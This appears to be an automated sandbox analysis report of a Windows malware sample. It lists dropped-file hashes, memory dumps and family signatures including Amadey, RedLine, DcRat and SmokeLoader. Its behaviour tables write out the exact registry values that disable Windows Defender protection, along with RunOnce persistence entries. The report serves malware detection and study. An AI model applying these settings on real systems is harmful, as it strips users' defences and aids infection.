C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XJKHGHKT\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

memory/2504-569-0x0000000000950000-0x0000000000990000-memory.dmp

memory/2588-579-0x00000000043C0000-0x0000000004CAB000-memory.dmp

memory/824-588-0x0000000070D10000-0x00000000713FE000-memory.dmp

memory/2504-587-0x0000000000820000-0x0000000000821000-memory.dmp

memory/2960-589-0x0000000070D10000-0x00000000713FE000-memory.dmp

memory/2588-599-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2960-624-0x0000000004540000-0x0000000004580000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 1147109b272902a6646e5f965ce72b41
SHA1 486f7718ef62b04051b6008606162d5e344efdeb
SHA256 053fa271d64035d1191ec98388c8db4b635f88ebad6e7a33875485a012533c53
SHA512 2463dee09be4321a30b2cb13d30ad6ac3218158d161ee6fef01c4932014de6e9299a8f6c9f54ee1a163b9387c6b0cccd3cefce65c9f21b6401835ba910c8b40d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b5927f639cf51583b1c318a70dfc08f6
SHA1 65efb37cda1266029de8ef73efc05d95111d19ca
SHA256 a18a267982868d01326817731f4afab986f0bd1643f5ab5fa184c63c619e8117
SHA512 b7c39a5782262b1298c57fe0185acf2cf13755c57ce9b864daf92a387095e5fd85b9961ffd07823a62e5012e3951b833ffe384d1bf04578853521575116a010d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 41635ad2a4e921abe603b38c91b7c918
SHA1 875439a88843bf178420fef226fcf25b7b380be5
SHA256 d1eafffcccfe7213b68d639728c925c711d5b2619b35b66f1395c39d3d59ccc7
SHA512 62567c22016cea255d885f4a0ca24ce6266e991c256cca2f71c223b094befdbc94ad16eacec441038a3e0e294e1eec4eb1a18a35d6cbd8636051ecb35d40aade

memory/824-721-0x0000000004830000-0x0000000004870000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 966933936de945a65a5c3006623f19d7
SHA1 7632286fe76aa305827d7429b2636ef0d969e9d5
SHA256 d71314f2f5729622ec4bafd41ad9c0d8a84794f6403fdd6551bb61c29dc369b0
SHA512 1270b60755f9ea2da3c706598690495b8dc2bfbfc2487b09d8e60221d47f8c39dfee7e313fc2ef79d9736ecffbb6091f1353018ab9d840de9d3b389843ea3976

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f88dd69779886c2b99bcb328da66fe6e
SHA1 52b69bd1213b7121b762259b93e8743629a487a7
SHA256 517f2501cb7043c3047fbc84080988b0a17262cebc31a7cd0c1686522a91db98
SHA512 56835cddc30e88a547d808b3ca7dbbee743a7ec70393a1fb904f131797e5bb74d64d16f97cdd047fc0ebbb1865971f2536080bee4b7cc58067fe84fee6759376

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d364322105eeda35adb8f75d3dbe264b
SHA1 3e8d048121afe88a6d1e7c915e949d57dfbdb583
SHA256 f5f28886da947ebbc298ad9c8dd72f957a6f1c1708ac01c2d3cc6868a070d1b6
SHA512 c5a2a673f79aae1a42e810ff89af6161cdb7feb53207d113b7c465c3c7f9687d6ce1172fcc8af765a33b952cb94181a53cf817d5a5402bb5a87e5f0a1000f09f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aa5700ac60e872dd6aa47b0db6646f63
SHA1 97e14b95fd01fee6685643ab5372079ebcea3d60
SHA256 94cd025800010326b4119b97911eaebeb1612364b43f00677b878e844fa057e3
SHA512 fe61f6fff8e5538ceb6c60eca9907ae91b7cdad2934db02c2b802908647cf29447613ef686cd5950f4c343523ba64ee066bca0e26c399e7c2b2cfcff40279104

memory/2504-895-0x0000000070D10000-0x00000000713FE000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ca7115786d46b0ced6592f8c4de4d9e1
SHA1 62a1bbaf7d84cc3374ca6f93918010db67f3df80
SHA256 e36f1bf2c70cb578d9531547ec13b3bad430500d1a1fa5170d86646a3b0a4688
SHA512 7a53ac506ff8e5b7e666187a6608fa0a5fb6c8c0077a98e1016cfe04f33902a5b883347885a3c971e881bf0995e934073ecd3b435ca159ca77fb7b1b74ab1a9e

memory/1272-915-0x0000000002DB0000-0x0000000002DC6000-memory.dmp

memory/2696-916-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2588-914-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2588-920-0x00000000043C0000-0x0000000004CAB000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

memory/872-932-0x0000000004100000-0x00000000044F8000-memory.dmp

memory/2504-933-0x0000000000950000-0x0000000000990000-memory.dmp

memory/544-934-0x000000013F720000-0x000000013FCC1000-memory.dmp

memory/872-935-0x0000000004100000-0x00000000044F8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8a553ea0a71aad4e26a4e3207e94d8b7
SHA1 fae6b621ad32b268676060a893e89abda2f7515d
SHA256 1483bf1e839fc5f43f428a132f0eb7e1e6f9ff9db7635c5ee598cfa098c3b49f
SHA512 4cb9d0ba9e5f5eedfb57233188e4ea22971ae0b7ff26e31da14838da2334ecdf208db81b3a5eec729eb807339a891cd52edc7a309f5ad5a36b2b687d73ce7c9b

memory/872-942-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 30cbf26e1570a5e72504f5996a25a2f7
SHA1 511d70519a5407bbca731fcfaac874332a3357a0
SHA256 97184bccfa71ee06bf443e05e5057941833db0475839983e3d637ce05e0b936c
SHA512 8eed3e9566962bcc92c5f62e1f13905bd39612e20c26205ec074658d0837f5cf888581fe45f36bcb4e4147aeb4bff35e3eb8975ec786db60ac8f846b23c7234f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0c9cc0c3b623465fe6df96c594dfc2fc
SHA1 590ec331345954a9f615acabff01a3203c74ecaa
SHA256 5f8621fcd7d672f0d6c3e9f973d3acd63a254ed998a588c69c557094503e8098
SHA512 c5d9a9e990627d3a29b2a06e0dc3d8f44fc47dfa41665a074ce5163608a4ac1a9b5b1aacb15ff8944cb2be6904952c1dae37402e86340c304b6396f8b9fb7d35

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 116d6e362b23fa53b60273be1ce7be98
SHA1 9e5b0943e656a7d762b38ec93e8bcbf7f3bbab3b
SHA256 75a5d58014c0b618bbb5412635082d7905f2eb4a0197d8630e0f1d78a2681e2f
SHA512 0f192f7d1fbaceb08e6769026a327ce558b37fb95e0a3e736c72c13e4eb4ec612702c0ef2b843d14a1efa4ecd6fd3957d6f979a99a8e80eac6e9d513bcaef2b8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 36a83985f4823037bf7c0351f1125adb
SHA1 e4055a1ac18ce2c797d8c80e9999c1472ca77ddb
SHA256 1ea35dfa26ae54cf93e69d2e73c2223953a19eba20d0d762066c6bb0bacb95ae
SHA512 647369c320a6d4f538dd7c99b863a740e39abdef38bad0bbefed3a490b999604af776f8d6239d8b1137b5dafae2ea32a56bfda02f8433d4c1c864c80f1ba340d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 602edf11b4dfd2beca64b3e4188eb62d
SHA1 bc5f66f0ed15d7b54951c469693c19eaedf28cc2
SHA256 36a2d111f8c18f1dd696728ded3758bc171e3a507327eb32cadda92813ff5227
SHA512 d7bcd3585f63e83a52b8166a80636caa3f7f856f2d60bdc7857835b1b0237a16abeb1c5651b831f1d387f84173e2f6ea5ba75b456ab54fcf301f3435a1418e4a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1f7bd24c57ef0ea25e0d9cc424e1ad98
SHA1 16a58b7ebcfde78e924e70ad9a26ee785309ed78
SHA256 27a9520a970622b4ba944a9971a1ebefbe0a7846dd92966a978746d2401a6797
SHA512 ffdef9c0330a81323c086ee457a90a7d1b56b56048b29247a5246a3d099c304a0225ea7200ae747506ed86aa710d8c07d5e2bd12fc44b4ef44a3d748afa11b57

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 642a437c8432a52be90726a5df29c2b8
SHA1 efe04409cb075ae66deba209496bd43cd9773449
SHA256 05fa76becb5954f44fec33d7b2e264d0fdd986f7f8b2f688f36a6ab0f2e1384f
SHA512 c660e040ab6906ea2416dfd2132a817fba9efe9571baf4e379bad6609dbd064ccd4a2be7f6de9bc376cae3ddecb7a0fc9bee078a68abb3b2ad8862c98f7ef904

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5144d97325ea52ca33c212efed228039
SHA1 71743c7bee0e527fff91dbc0e5a263e2598539d4
SHA256 aee4a69c36e9718b4632a576c76d40471a51300ebd3b154962a23b5947cfb563
SHA512 91ae738c4660d450c9f57881184ec7d63f4f67609315da76e699a0717f784a770dfef406069eb171781d4965d22268459ff7ddc07f72f551929895434765a692

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80e99eaef883aa1837c0ddf8b3817716
SHA1 caae3cb90b9d59e6eab82f7346b9c58443b8f377
SHA256 1563459cae2c649d39305b3095b91efb14e3a86c6137a4d2011fa0f71977edf3
SHA512 3e1a6ceb7121847cba829952f6fbf1a74b85037e4a1a23867ac133e364382019571ddae63616dbe63ef846b5122ef7987839c4423d29a5517b2aac847f86fb56

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a60f94ba1cc53886ffe1a73159b76ee3
SHA1 7bacdad87a288b4540b3e339e9e2dc1d5984fdb3
SHA256 de47e08a85ff454c6f9307e4be96835354f58b29836c12414f40397b1a5b6e45
SHA512 39af84d7d9359eb3474c669c5dca8ddc72e514e5e92da86920a9fe721e436df62e74aa6868803aea5a5535d0d6f07c1c334f18dd37e2d4af0a4547b4d0ba98b5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c15f5751ff185a96bed14a8a4d73043
SHA1 c560c2275cb37a093aad0245a6316d59938f4e35
SHA256 1e61f963a5c9266465bcb8fa09a96ae1c2726ecf602a4d60e25f33c619870ed7
SHA512 cd470633f28891fbfc2760cec378bd3706b1d8c3a588246fd971b18bf7a79881eebc67c5fc8cb63fc387652594efbd23f5a2613ef1155de2c02d651391149b3d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9401d3c2b3e6e50735b633cea308b30d
SHA1 e66e690ff88d6d522e3b1b3b08e77961639fd8dc
SHA256 32a28c2093ee7ac78109d0a2891c66e318031a482f8571e4e12a8dc6b59d1f02
SHA512 c9a9dd9317434c4b63934711db7d4afce60965a2ca0735c7353d43ca6da55cc910e28147dddb67342d8c6fc421de9c1519c40deb6dacc785807eb72b00e25c42

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4ccd23476702243ac385f2e31537c96a
SHA1 3caa7ede31d2c4bd039b36d3f58976cae96f30ef
SHA256 1003cbf0a753850412750612a5c764643452d368d43bac69e3b7d288c3bc7d22
SHA512 864ae034d5ee4afc055603100c24dbe0d5a0067f30a0d77463218cb9aac35e7028443ec1a396917bdddb496702de2ab9dc10c2c0fe65333d6d7526363303e18d

memory/1784-1715-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/872-1782-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2504-1783-0x00000000008A0000-0x00000000008BC000-memory.dmp

memory/2504-1787-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1795-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1799-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1803-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1801-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1807-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1805-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1797-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1793-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1791-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1789-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1784-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1785-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1809-0x00000000008D0000-0x00000000008D1000-memory.dmp

memory/2468-1816-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2468-1815-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2468-1817-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2468-1818-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2468-1819-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2468-1820-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2468-1822-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1468-1825-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

memory/2504-1826-0x0000000070D10000-0x00000000713FE000-memory.dmp

memory/1468-1827-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/1468-1834-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/1468-1836-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/1468-1837-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/1468-1838-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/1468-1840-0x00000000025CB000-0x0000000002632000-memory.dmp

memory/1468-1841-0x00000000025C4000-0x00000000025C7000-memory.dmp

memory/872-1842-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2960-1845-0x0000000070D10000-0x00000000713FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpFDC2.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpFE83.tmp

MD5 ffb3fe1240662078b37c24fb150a0b08
SHA1 c3bd03fbef4292f607e4434cdf2003b4043a2771
SHA256 580dc431acaa3e464c04ffdc1182a0c8498ac28275acb5a823ede8665a3cb614
SHA512 6f881a017120920a1dff8080ca477254930964682fc8dc32ab18d7f6b0318d904770ecc3f78fafc6741ef1e19296f5b0e8f8f7ab66a2d8ed2eb22a5efacaeda5

memory/2468-1957-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2084-1959-0x0000000004110000-0x0000000004508000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R2FXS7CJRO3V95LTAJXZ.temp

MD5 abf50e556acc54c939af77100699b3b2
SHA1 883553c95f8281d2896d4ea07312d8b85f6c0dc0
SHA256 3744665131772cabec3ffc1e271d76f0d37017e5b16022fcfd63e20a5a022fd9
SHA512 01c297e8fbb40fd710c5e4fe097f29fc4afde1c972ada046bd306727fda4ab3ef7a5ba5c4fa7878bfa289d463d4e41b20d57be89e77679afcf709f72b61c9a4c

memory/1560-1964-0x000000001B150000-0x000000001B432000-memory.dmp

memory/1560-1965-0x0000000002320000-0x0000000002328000-memory.dmp

memory/1560-1967-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/2084-1966-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1560-1968-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1560-1993-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1560-2002-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1560-2001-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1560-2000-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1560-2003-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/824-2006-0x0000000070D10000-0x00000000713FE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 23:11

Reported

2023-10-10 23:14

Platform

win10v2004-20230915-en

Max time kernel

152s

Max time network

191s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\D86B.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\E0BB.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1ECF.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A9D7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C33C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kx4St2pf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IB0tc6CQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ok8bG1wv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FG2wS5ol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1OG42Qe5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D86B.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DBE7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E0BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2hH861vm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ECF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B35F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5A2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B8D0.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wvtwddb N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kx4St2pf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IB0tc6CQ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ok8bG1wv.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FG2wS5ol.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\A9D7.exe N/A

Checks installed software on the system

discovery

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
